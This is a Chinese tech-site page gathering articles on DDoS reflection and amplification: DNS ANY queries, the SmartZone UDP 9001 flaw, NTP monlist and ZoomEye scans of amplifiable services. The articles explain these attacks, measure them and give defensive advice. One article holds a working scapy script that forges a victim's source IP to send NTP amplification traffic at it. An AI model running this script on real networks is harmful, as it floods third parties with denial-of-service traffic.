精华内容
下载资源
问答
  • 2020-06-09 18:17:02

    实验测试了许多域名,最终效果最好的放大了仅仅10倍。
    如果有放大倍数更高的方式,请留言告诉我。

    引发问题原因:

    dns请求中,发起type=any的请求时,DNS服务器将回复a,any,mx,ns,soa,hinfo,axfr,txt,...所有设定的值,响应包将比请求包字节数大很多。

    实验:

    测试命令为:

    dig @NDS服务器 any 域名
    

    通过dig提交

    dig +qr @114.114.114.114  any hp.com
    

    下图tpcudmp数据包可见,本例子放大10倍。
    放大10倍

    更多相关内容
  • 文档名称DDos反射放大攻击全球探测分析 DDoS反射放大攻击全球探测分析 第五版 知道创宇404实验室 V 5.0 2019-05-06 1 北京知道创宇信息技术股份有限公司 第 页 文档名称DDos反射放大攻击全球探测分析 1.更新情况 ...
  • 图6 反射源名称 结合payload中展示的网关配置名称VNet01,可以判断是一起利用SmartZone网络控制器的DDoS反射放大攻击。 2)攻击模拟 在Ruckus公司授权后,我们选取其中一部分反射源进行发包模拟攻击,我们使用nc...

    0x00概述

    7月19日,Ruckus公司发布公告,宣称修复了SmartZone系列产品的重大安全漏洞,并对百度安全智云盾团队发现并协助其修复漏洞表达感谢。

    图1 安全公告

    6月29日,百度安全智云盾团队首次定位到一种反射源名称为SmartZone的新型反射放大攻击。经过安全专家进一步分析,确认是Ruckus公司的SmartZone系列设备存在安全风险。通知厂商后,他们积极组织技术人员进行排查,在此期间我们也多次提供安全建议和验证方法。7月19日该公司正式对外发布安全公告。

    这是一起”无穷大”倍数的反射攻击,在他们修复后我们将反射原理进行分享并预警。

    0x01反射原理

    攻击者采用反射方式实施DDoS攻击时,不是直接攻击受害者IP,而是伪造了大量受害者IP的请求发给相应的开放服务,通常这类开放服务不对源进行校验而是立即完成响应,这样更大更多的响应数据包发送到受害者IP,从而实现了流量的反射,这类开放服务就是反射源。

    原理如下图所示:

    图2 反射攻击原理示意图

    图2中攻击者P伪造了请求包BA并发送到PA,但BA的源IP是PV,所以PA响应的时候发送BV给到PV。

    反射攻击一方面隐藏了攻击IP,同时还有一个重要特征是放大,上述原理图中的BV往往是BA的好几倍,甚至是成千上万倍。正是有了这样的特性,黑客组织乐此不疲的使用这一攻击方式,并不断的研究新型反射攻击增强攻击效果。

    0x02攻击分析

    智云盾系统检测到攻击时,自动对攻击流量进行采样,安全专家对采样包及时进行了深层次的分析和演练。本次攻击事件共涉及反射源802个。

    1)攻击包分析

    通过分析智云盾的攻击采样包发现,反射流量的端口来自于UDP 9001,下图红色箭头指向的是反射源端口:

    图3 反射源端口

    分析采样包发现,攻击流量中含有大量的IP分片包,这些IP分片包均来自于UDP 9001端口的反射流量,由于反射包大小超过了数据传输链路的MTU值,IP协议就会进行分片,如下图所示:

    图4 攻击包存在大量分片

    反射数据包的payload存在很多明文信息以及网关配置名称VNet01,如下图所示:

    图5 反射数据包payload

    我们对反射源进行指纹识别后获取到设备通用名称为vSZ与SmartZone100,vSZ是Virtual SmartZone的缩写,SmartZone是Ruckus公司生产的一系列网络控制器的名称。

    图6 反射源名称

    结合payload中展示的网关配置名称VNet01,可以判断是一起利用SmartZone网络控制器的DDoS反射放大攻击。

    2)攻击模拟

    在Ruckus公司授权后,我们选取其中一部分反射源进行发包模拟攻击,我们使用nc命令向反射源发送攻击payload为空的UDP数据包,并针对反射源IP进行抓包,最后发现反射源的9001端口会响应大量消息。复现攻击如下图所示:

    图7 抓包结果

    通过模拟攻击确认,发送一个0字节的请求(IP包长42),会收到4个数据包,包括1个udp包(890)和3个分片包(1514)。

    3)放大倍数

    按照我们前期对反射倍数的研究结果,科学的统计放大倍数,应当包括数据包协议头和网络帧间隙。详细的方案可以参阅《MEMCACHED DRDoS攻击趋势》一文。

    协议头和网络帧间隙计算为:14(以太头)+20(IP头)+8(UDP头)+4(FCS头)+20(帧间隙)=66字节,请求包长小于60字节会被自动填充,所以请求包所占带宽为(60+20+24)=84字节。响应包包含分片,由于分片包头不包含UDP头,所以计算得到的响应包所占带宽为(1514+24)x3+890+24=5528字节。

    最终我们计算得到的放大倍数为5528/84=65.8倍,这个放大倍数已经超过了很多我们所熟知的反射攻击。

    如果按照传统放大倍数的计算方法,攻击payload为0的情况下,这将是”无穷大”倍数的反射攻击。

    0x03漏洞详情

    1)漏洞原因

    Ruckus公司修复后发布了安全公告

    (https://support.ruckuswireless.com/security_bulletins/312)

    图8 安全公告

    Ruckus宣称该攻击发生的原因是因为SmartZone控制器的eAut模块中存在一个漏洞,该漏洞允许未经身份验证的远程攻击者发送任意请求,对另一网络设备执行DDoS攻击。该漏洞是由于eAut模块的代码处理不当造成的,详情可查看公告链接。

    根据Statista最新数据,目前全球共约750亿台联网设备。数以百亿的设备接入网络,同时也带来了大规模的软件服务暴露到互联网上,攻击防护刻不容缓。

    2)如何防范?

    一方面我们会持续关注新型攻击,及时预警;另一方面我们也呼吁为了减少开放服务成为攻击者的帮凶,希望各厂商重视安全,做好相应服务的防护治理。参考以下建议进行预防:

    • 企业设计软件时,需要对端口连接对象进行身份认证和鉴权,对未授权请求不予响应,或减少响应

    • 禁用UDP;不能禁用时,设计的UDP服务应确保鉴权前,响应数据包不大于请求数据包长

    • 没有公网访问需求,不启用公网IP,如有需要,应添加防火墙规则

    • 敏感数据传输,要进行加密处理,避免明文传输

    智云盾团队介绍

    百度智云盾是百度安全专注在互联网基础设施网络安全攻防的团队,提供T级云防、定制端防和运营商联防等DDoS/CC防御解决方案。一直服务于搜索、贴吧、地图、云等百度业务,在保障百度全场景业务之余也进行防御能力外部输出,为互联网客户提供一体化的防御服务。

    展开全文
  • NTP DDoS反射放大攻击实验

    千次阅读 2020-06-08 17:50:55
    NTP:Network Time Protocol 网络时间协议(NTP)是一种通过因特网服务于计算机时钟的同步时间协议。它提供了一种同步时间机制,能...NTP 反射放大攻击 无论是基于 DNS 还是基于 NTP,其最终都是基于 UDP 协议的。在

    NTP:Network Time Protocol

    网络时间协议(NTP)是一种通过因特网服务于计算机时钟的同步时间协议。它提供了一种同步时间机制,能在庞大而复杂多样因特网中用光速调整时间分配。它使用的是可返回时间设计方案,其特点是:时间服务器是一种分布式子网,能自我组织操作、分层管理配置,经过有线或无线方式同步逻辑时钟达到国家标准时间。此外,通过本地路由选择运算法则及时间后台程序,服务器可以重新分配标准时间。

    NTP 反射和放大攻击

    无论是基于 DNS 还是基于 NTP,其最终都是基于 UDP 协议的。在 UDP 协议中正常情况下客户端发送请求包到服务端,服务端返回响应包到客户端,但是 UDP 协议是面向无连接的,所以客户端发送请求包的源 IP 很容易进行伪造,当把源 IP 修改为受害者的 IP,最终服务端返回的响应包就会返回到受害者的 IP。这就形成了一次反射攻击。

    放大攻击呢就是一次小的请求包最终会收到一个或者多个多于请求包许多倍的响应包,这样就达到了四两拨千斤的效果。

    那我们接着来看什么是 NTP 的反射和放大攻击,NTP 包含一个 monlist 功能,也被成为 MON_GETLIST,主要用于监控 NTP 服务器,NTP 服务器响应 monlist 后就会返回与 NTP 服务器进行过时间同步的最后 600 个客户端的 IP,响应包按照每 6 个 IP 进行分割,最多有 100 个响应包。

    实验

    linux中,可以使用ntpdate、ntpdc进行反射测试。

    模拟协议,客户端执行以下命令,执行成功时,说明服务端存在被攻击风险,可实施攻击。

    ntpdc -n -c monlist x.x.x.x(xxx这里写ntp服务的IP)
    

    如果报错:
    timed out, nothing received
    ***Request timed out
    请检查ntp服务器配置,/etc/ntp.conf,将(restrict)拒绝注释掉,重启服务。
    ntp.conf配置

    测试结果,此处内网由于数据量小,仅放大7倍。
    内网模拟,放大了7倍

    Python利用程序

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    
    import sys
    from scapy.all import *
    
    def attack(target, ntp_server):
        send(IP(dst=ntp_server, src=target)/(UDP(sport=52816)/NTP(version=2, mode=7, stratum=0, poll=3, precision=42)))
    
    if __name__ == "__main__":
        if len(sys.argv) != 3:
            print("执行方法: python xxx.py  攻击目标  ntp服务器文件")
            sys.exit(1)
    
        target = sys.argv[1]
        ntp_server_file = sys.argv[2]
        for ntp_server in open(ntp_server_file, "r"):
            ntp_server = ntp_server.strip()
            if ntp_server != "":
                attack(target, ntp_server)
    
    
    展开全文
  • ZoomEye专题:https://www.zoomeye.org/topic?id=Global-Detection-and-Analysis-of-Amplified-Reflection-DDoS-Attacks PDF 版本:下载 English Version: https://paper.seebug.org/899/ 如果你想第一时间了解漏洞...

    作者:知道创宇404实验室
    ZoomEye专题:https://www.zoomeye.org/topic?id=Global-Detection-and-Analysis-of-Amplified-Reflection-DDoS-Attacks
    PDF 版本:下载
    English Version: https://paper.seebug.org/899/
    如果你想第一时间了解漏洞资讯,可以关注我们的知道创宇Paper:https://paper.seebug.org/898/

    1.更新情况

    在这里插入图片描述

    2.概述

    DDos攻击是一种耗尽资源的网络攻击方式,攻击者通过大流量攻击,有针对性的漏洞攻击等耗尽目标主机的资源来达到拒绝服务的目的。

    反射放大攻击是一种具有巨大攻击力的DDoS攻击方式。攻击者只需要付出少量的代价,即可对需要攻击的目标产生巨大的流量,对网络带宽资源(网络层)、连接资源(传输层)和计算机资源(应用层)造成巨大的压力,2016年10月美国Dyn公司的DNS服务器遭受DDoS攻击,导致美国大范围断网。事后的攻击流量分析显示,DNS反射放大攻击与SYN洪水攻击是作为本次造成美国断网的拒绝服务攻击的主力。由于反射放大攻击危害大,成本低,溯源难,被黑色产业从业者所喜爱。

    在2017年8月3日到2017年8月6日期间ZoomEye网络空间探测引擎对全网进行第一轮的探测,统计可被利用进行DDoS反射放大攻击的主机数,发布了《DDoS反射放大攻击全球探测分析-第一版》,之后在2017年8月11日到2017年8月13日期间ZoomEye网络空间探测引擎再次对全网进行了探测,发布了《DDoS反射放大攻击全球探测分析-第二版》。之后在2017年11月13日到2017年11月15日期间,ZoomEye网络空间探测引擎探测到了另一个活动频繁的攻击——CLDAP DDoS反射放大攻击,随后对DDoS反射放大攻击进行了第三轮的探测,发布了《DDoS反射放大攻击全球探测分析-第三版》。

    在2018年3月1日,ZoomEye又探测到在网络空间中频繁活动Memcached DRDoS, 进行第四轮对DDoS反射放大攻击的探测。

    在2019年5月6日,ZoomEye又对网络空间种频繁活动的CoAP进行了DDoS反射放大攻击探测,并完善为第五版。

    3.第五版放大攻击数据分析

    [注:下面数据统计基于第四轮 2018/03/05 与 2019/05/06 CoAP数据]

    2018年3月5日,进行了第四轮探测,ZoomEye网络空间探测引擎在对前面两轮6种DDoS攻击的探测的基础上,增加了对Memcached的探测。2019年5月6日,在第四轮基础上,增加了对CoAP的探测,并完善为第五版。

    3.1.CHARGEN

    通过ZoomEye网络空间探测引擎获取到9万(95,010)台主机开放了19端口。然后对这9万主机进行放大倍率的探测,实际上只有1万(10,122)台主机开启了19点端口,占总数的10.65%。在开启了19端口的主机中,有6千(6,485)台主机的放大倍数能够达到10倍以上,占总数的64.07%,剩下的主机的放大倍数主要集中在2倍。相关数据如图3.1-1所示:

    在这里插入图片描述

    对放大倍数达到10以上的主机流量进行统计,我们总共发送了870KB(891,693 byte)的请求流量,得到了71M(74,497,401 byte)响应流量,产生了83倍的放大流量。假设一台主机1分钟内可以成功响应100个请求数据包,计算得到攻击流量有947Mbits/s。本轮探测对最大放大倍数进行了统计,得到了Chargen协议单次请求响应最高能放大319倍流量。

    上面的数据和之前两次的的数据进行比较,Chargen DDoS攻击的危害并没有减小,反而有增大的趋势。

    根据ZoomEye网络空间探测引擎的探测结果,对可利用的Chargen主机进行全球分布统计,见图3.1-2:

    在这里插入图片描述

    从图中可以看出仍然是韩国具有最多数量的可被利用进行DDos反射放大攻击的主机,我国排在第二 。下面,对我国各省份的情况进行统计,如图3.1-3所示:

    在这里插入图片描述

    3.2.NTP

    通过ZoomEye网络空间探测引擎获取到14万(147,526)台开启了UDP 123端口的主机。利用这些数据进行放大倍率探测,实际上只有1千(1,723)台主机开启了UDP 123端口,占总数的1.17%,放大倍数大于10的主机只有4台,占有响应主机总数的0.23%,具体数量见图3.2-1所示:

    在这里插入图片描述
    和上一次探测的结果相比,利用NTP进行反射DDoS攻击的隐患基本消除,不管是NTP服务器的总量还是可被利用服务器数量,都大幅度下降,尤其是本次探测中,只发现4台可被利用的NTP服务器,而且这4台皆位于日本。我国未被探测到可被利用的NTP服务器。

    3.3.DNS

    通过Zoomeye网络空间探测引擎获取到2千万(21,261,177)台UDP 53端口相关的主机,对这些主机进行放大倍率探测,实际上只有384万(3,847,687)台主机开启了53端口,占了扫描总数的18.1%。在开启了53端口的主机中,有3万(31,999)台主机放大倍数在10倍以上,只占总数的0.83%,而放大倍数为1的主机有277万(2,776,027)台,具体数据见图3.3-1:

    在这里插入图片描述

    和上一版的数据相比,互联网上DNS服务器的和可被利用的DNS服务器数量均处于下降状态。

    下面,再来看看这3万台放大倍数大于10的主机全球分布情况,如图3.3-2所示,可以看到,和上一轮相比,数量排名没啥变化,仍然是美国排在第一位。我们又对可利用主机在我国的分布情况进行了统计,如图3.3-3所示,和上一轮相比,湖北省的DNS服务器数量有了明显的提高。
    在这里插入图片描述

    在这里插入图片描述

    3.4.SNMP

    通过Zoomeye网络空间探测引擎获取到1千万(11,681,422)台UDP 161端口相关的主机,对这些主机进行放大倍率探测,实际上有167万(1,677,616)台主机开启了161端口,占了扫描总数的14.36%。在开启了161端口的主机中,有61万(617,980)台主机放大倍数在10倍以上,占了总数的36.84%,具体数据见图3.4-1:

    在这里插入图片描述

    本次探测得到的数据和前一轮的数据相比较,探测到的SNMP主机数增加,而可利用的主机数却呈下降状态。

    下面,再来看看这61万台放大倍数大于10的主机全球分布情况,如图3.4-2所示,可以看到,我国的主机量上升到了第二位。我们又对可利用主机在我国的分布情况进行了统计,如图3.4-3所示,台湾,北京,黑龙江仍然是受影响最深的几个省份之一。

    在这里插入图片描述

    在这里插入图片描述

    3.5.SSDP

    通过Zoomeye网络空间探测引擎获取到3千万(32,522,480)台UDP 1900端口相关的主机,对这些主机进行放大倍率探测,实际上有60万(609,014)台主机开启了1900端口,占了扫描总数的1.87%。在开启了1900端口的主机中,有57万(572,936)台主机放大倍数在10倍以上,占了总数的94.08%,具体数据见图3.5-1:

    在这里插入图片描述

    下面,再来看看这57万台放大倍数大于10的主机全球分布情况,如图3.5-2所示,和上一轮探测的数据相比,没有明显的变化。 再对我国的数据进行统计,如图3.5-3所示,台湾仍是我国可被利用的主机数最多的省份,远远超过我国的其他省份。
    在这里插入图片描述
    在这里插入图片描述

    3.6.CLDAP

    通过Zoomeye网络空间探测引擎获取到40万(403,855)台UDP 389端口相关的主机,对这些主机进行放大倍率探测,实际上有1万(17,725)台主机开启了389端口,占了扫描总数的4.39%。在开启了389端口的主机中,有1万(17,645)台主机放大倍数在10倍以上,占了总数的99.55%,具体数据见图3.6-1:

    在这里插入图片描述
    下面,再来看看这2万台放大倍数大于10的主机全球分布情况,如图3.5-2所示,可以看到,美国仍然是可被利用的CLDAP服务器数量最多的国家,我国依旧排第三位。我们又对可利用主机在我国的分布情况进行了统计,如图3.5-3所示,台湾依然是我国可被利用的主机数最多的省份,和香港一起远远超过我国的其他省份地区。

    在这里插入图片描述
    在这里插入图片描述

    3.7.Memcached

    Memcached是一个自由开源的,高性能,分布式内存对象缓存系统。Memcached是以LiveJournal旗下Danga Interactive公司的Brad Fitzpatric为首开发的一款软件。现在已成为mixi、hatena、Facebook、Vox、LiveJournal等众多服务中提高Web应用扩展性的重要因素。Memcached是一种基于内存的key-value存储,用来存储小块的任意数据(字符串、对象)。这些数据可以是数据库调用、API调用或者是页面渲染的结果。Memcached简洁而强大。它的简洁设计便于快速开发,减轻开发难度,解决了大数据量缓存的很多问题。它的API兼容大部分流行的开发语言。本质上,它是一个简洁的key-value存储系统。一般的使用目的是,通过缓存数据库查询结果,减少数据库访问次数,以提高动态Web应用的速度、提高可扩展性。

    Memcached Server在默认情况下同时开启了TCP/UDP 11211端口,并且无需认证既可使用Memcached的储存服务。2018年3月2日,ZoomEye对全网开启了UDP 11211端口,并且无需认证的Memcached进行探测,共得到14142个目标,并对这些目标进行全球分布统计,如图3.7-1所示:

    在这里插入图片描述

    从上图中可以明显的看出我国对安全问题的重视程度和国外仍然有较大的差距。在14142个有效目标中,有11368个目标的IP地址位于我国。下面再对我国的目标进行全国分布统计,如图3.7-2所示:

    在这里插入图片描述

    Memcached未开启认证的情况下,任何人都可以访问Memcached服务器,储存键值对,然后可以通过key来获取value。所以,为了摸清出全球Memcache可利用的情况,我们在Memcached储存一个key为1byte的,value为1kb的数据,然后我们再通过该key获取到value,这样就产生了将近1000倍的放大效果。Memcached在默认情况下还会开启UDP端口,所以这就导致了Memcached可以被利用来进行DDoS放射放大攻击。而Memcached能放大多少倍取决于:

    1. Memcached服务器带宽
    2. Memcached能储存的值的最大长度

    利用自己的服务器进行一个测试,首先让能利用的Memcached储存一个1kb长度的值,然后同时向所有目标获取值,能收到886Mbit/s的流量,如图3.7-3所示:

    在这里插入图片描述

    3.8.CoAP

    CoAP(Constrained ApplicationProtocol)是一种应用在物联网网络的应用层协议,它的详细规范定义在RFC 7252。由于物联网设备大多都是资源限制型设备,例如有限的CPU、RAM、带宽等。对于这类设备来说想要直接使用现有网络的TCP和HTTP来实现设备间的通信显得很奢侈。为了让这部分资源受限的设备也能够顺利的接入网络,CoAP协议应运而生。CoAP指受限制的应用协议,是基于UDP实现的类HTTP协议。相比于HTTP协议,CoAP继承了HTTP协议的可靠传输,数据重传,块重传,IP多播等特点。并且CoAP利用二进制格式传递数据,这样使得CoAP请求更加的轻量化,并且占用的带宽更小。

    CoAP协议规定提供服务的设备,必须提供./well-known/core的Uri-path并且默认绑定在5683端口上。2019年5月6日,通过Zoomeye网络空间探测引擎获取到857,031台UDP 5683端口相关的主机,对这些主机进行放大倍率探测,实际上有344,462台主机开启了5683端口,占了扫描总数的40.19%。在开启了5683端口的主机中,有137,207台主机放大倍数在10倍以上,占了总数的39.83%,具体数据见图3.8-1:

    在这里插入图片描述

    对响应主机全球分布情况分析如图3.8-2,可以看到主要分布在俄罗斯与中国:

    在这里插入图片描述

    对响应主机国内分布情况分析如图3.8-3,主要分布在江西、四川、新疆

    在这里插入图片描述

    另外,我们对国内设备的响应报文进行了简单分析,发现有大量设备的响应数据中都包含有Qlink关键字。

    4.总结

    和前面三轮探测的数据相比,在第四轮的探测中,变化最大的是NTP服务,当前互联网的NTP服务器已经没办法造成大流量的DDoS反射放大攻击了。与之相比,其他协议也或多或少的降低了可被利用的主机数量 。DDoS反射放大攻击仍然危害巨大,DDoS防御仍然刻不容缓。

    从这次ZoomEye探测到的数据中,再和公网上的Memcached服务进行对比:

    在这里插入图片描述

    在ZoomEye的数据库中,开启11211端口的目标有54万,其中美国有23万,中国有13万的目标,但是开启了UDP 11211端口的数据中,总量只有14142,其中美国有1070的目标,中国有11368个目标主机。

    从这些数据对比中,可以看出美国对此类的安全事件有非常快的响应速度,中国和美国的差距还很大。

    从放大效果来看,虽然可利用的目标已经缩减到1万的量级,但是仍然能造成大流量的DDos攻击。

    对于Memcached的用户,我们建议关闭其UDP端口,并且启用SASL 认证,对于运营商,建议在路由器上增加的uRPF(Unicast Reverse Path Forwarding)机制,该机制是一种单播反向路由查找技术,用于防止基于源地址欺骗的网络攻击行为,利用该机制能使得UDP反射攻击失效。

    第五版中,增加了对于CoAP的探测,从上面统计与分析的数据中可以看到,能被利用进行DDoS反射放大的主机主要分布在俄罗斯与中国,并且放大效果在10倍以上的主机也不少。对于使用CoAP的互联网服务,可以禁用UDP,不能禁用时确保请求与响应不要有倍数关系,也可以启用授权认证;对于企业用户,没有UDP相关业务,可以再上层或者本机防火墙过滤掉UDP包,可以寻求运营商提供UDP黑洞的IP网段做对外网站服务,也可以选择接入DDoS云防安全服务或删除协议默认路径; 对物联网用户,如果没有公网访问需求,物联网设备不启用公网IP,如果有公网访问需求,应添加防火墙规则,限制访问IP,减少互联网暴露面。

    5.参考链接

    1.Stupidly Simple DDoS Protocol (SSDP) generates 100 Gbps DDoS.
    https://blog.cloudflare.com/ssdp-100gbps/
    2.基于SNMP的反射攻击的理论及其实现.
    http://drops.xmd5.com/static/drops/tips-2106.html
    3.基于Memcached分布式系统DRDoS拒绝服务攻击技术研究.
    https://paper.seebug.org/535/
    4.ZoomEye Chargen dork.
    https://www.zoomeye.org/searchResult?q=port%3A19
    5.ZoomEye NTP dork.
    https://www.zoomeye.org/searchResult?q=port%3A123
    6.ZoomEye DNS dork.
    https://www.zoomeye.org/searchResult?q=port%3A53
    7.ZoomEye SNMP dork.
    https://www.zoomeye.org/searchResult?q=port%3A161
    8.ZoomEye LDAP dork.
    https://www.zoomeye.org/searchResult?q=port%3A389
    9.ZoomEye SSDP dork.
    https://www.zoomeye.org/searchResult?q=port%3A1900
    10.ZoomEye Memcached dork.
    https://www.zoomeye.org/searchResult?q=port%3A11211
    11.ZoomEye CoAP dork
    https://www.zoomeye.org/searchResult?q=port%3A5683

    本文由 Seebug Paper 发布,如需转载请注明来源。


    欢迎关注我和专栏,我将定期搬运技术文章~

    也欢迎访问我们:知道创宇云安全 :https://www.yunaq.com/?from=CSDN91829

    在这里插入图片描述
    如果你想与我成为朋友,欢迎加微信kcsc818~

    展开全文
  • 反射放大攻击是一种具有巨大攻击力的DDoS攻击方式。攻击者只需要付出少量的代价,即可对需要攻击的目标产生巨大的流量,对网络带宽资源(网络层)、连接资源(传输层)和计算机资源(应用层)造成巨大的压力。2016年...
  • 基于UDP的DDos反射放大攻击

    千次阅读 2017-09-21 10:41:00
    转自:https://www.us-cert.gov/ncas/alerts/TA14-017A ProtocolBandwidth Amplification Factor DNS 28 to 54 NTP 556.9 SNMPv2 6.3 NetBIOS 3.8 SSDP 30.8 CharGEN 358.8 ......
  • 反射放大攻击是一种具有巨大攻击力的DDoS攻击方式。攻击者只需要付出少量的代价,即可对需要攻击的目标产生巨大的流量,对网络带宽资源(网络层)、连接资源(传输层)和计算机资源(应用层)造成巨大的压力。2016年...
  • 摘 要:提出了一种利用NTP反射放大攻击的特点,通过对中国大陆开放公共NTP服务的主机定期发起主动探测(执行monlist指令),利用返回信息对全球范围NTP反射类DRDoS攻击事件进行长期追踪观察和统计分析。...
  • 2021 年 8 月马里兰大学 Kevin Bock 等在 USENIX 大会上提出一种利用中间盒发起的新型 TCP 反射放大攻击手法:攻击者可以利用部分网络中间盒在 TCP 会话识别上的漏洞,实现一种全新的 DDoS 反射放大
  • 网络安全之反射放大型DDOS

    千次阅读 热门讨论 2021-03-01 21:19:38
    反射放大型DDOS即利用反射手段将分布式拒绝服务攻击进一步放大,同时隐藏掉自己的身份。 为了防止这种网络攻击,我们需要弄清其原理,从而更好的保障信息财产安全。 接下来从三步走的方式弄懂反射放大型DDOS的原理、...
  • https://www.youtube.com/watch?v=OSfgTbjb3og https://geneva.cs.umd.edu/papers/usenix-weaponizing-ddos.pdf https://github.com/breakerspace/weaponizing-censors https://geneva.cs.umd.edu/post
  • 反射攻击放大攻击DDoS不同,中间系统是未被感染的。反射/放大攻击利用网络系统正常的功能。 攻击程序: 攻击者送出一个伪造来源IP地址的封包给在某一个服务器上执行的服务。 服务器回复一个封包给...
  • MDNS Reflection DDoS ...Q3,Akamai SIRT开始观测现网是否存在mDNS反射放大攻击。 攻击威胁 2015年9月,第一次在现网观测到mDNS反射放大攻击。 攻击中,抓到攻击者假冒被攻击者IP向网络发送DNS请求,...
  • 浅析 DNS 反射放大攻击

    千次阅读 2019-07-11 12:00:42
    DNS 反射放大攻击分析前阵子业务上碰到了 DDOS 攻击,正好是 DNS 反射型的,之前只是听过,没自己处理过,仔细学习了一番之后做点记录。简介DNS 反射放大攻击主要...
  • 过去,反射放大攻击主要限于基于用户数据报协议 (UDP) 的协议。 然而,该团队表示,利用网络中间件中普遍存在的 TCP 不合规性可能会导致它们做出响应并放大网络流量——可能会产生大量放大。 UMD 计算机科学助理...
  • DDOS攻击总结

    万次阅读 2018-08-25 21:26:35
    最近对DDOS攻击做了初步的调研,对DDOS攻击产生的原因以及对其的检测、防御机制有一些粗浅的认识。本文重点在于对于传统网络架构下,城域网环境中DDOS攻击的一些思考。 DDOS攻击产生原因及对已知攻击的防御措施 与...
  • UDP反射放大攻击

    千次阅读 2020-04-10 13:35:02
    UDP反射放大攻击放大攻击原理 放大攻击原理 很多协议在响应包处理时,要远大于请求包,一个字节的请求十个字的响应,十个字节的请求一百个字的响应,这就是UDP反射放大攻击最根本的原理。以下将Memcached服务作为...
  • DDOS反射攻击

    千次阅读 2018-12-13 20:49:27
    DDOS反射攻击实验 实验目的 学习DDOS放大攻击原理 使用python scapy工具 实验环境 包含3台主机 attact 作为攻击方,使用Centos7.2 reflect 作为流量放大器,安装有dns 、ntp 、memcached三种可以放大流量的服务 ...
  • 0x00概述 全球DDoS网络攻击次数不断增长,反射攻击次数也是逐年上升,笔者在之前撰写的文章《史上最大DDoS攻击"之争"》中提到的几次”最大”攻击,都是以CLDAP为主...
  • 分布式拒绝服务攻击(Distributed Denial of Service)简称DDoS,亦称为阻断攻击或洪水攻击,是目前互联网最常见的一种攻击形式。DDoS攻击通常通过来自大量受感染的计算机(即僵尸网络)的流量,对目标网站或整个...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 886
精华内容 354
关键字:

ddos反射放大攻击